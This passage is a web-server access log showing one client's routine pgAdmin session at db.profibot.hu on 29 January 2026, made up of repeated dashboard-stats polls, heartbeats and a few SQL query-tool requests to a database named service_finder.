Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:59:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:00:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:00:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:01:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:01:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:02:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:02:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:03:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:03:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:04:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:04:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:05:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:05:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:33 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:33 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:06:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:06:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:00 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:07:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:08:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:08:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:09:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:09:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:09:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:09:58 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:00 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:00 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:02 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:02 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:03 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 137] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:03 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 315] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:03 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:04 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:06 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:10:10 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:10:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:11:00 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:11:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:11:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:11:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:11:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:11:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:12:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:12:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:13:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:13:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" 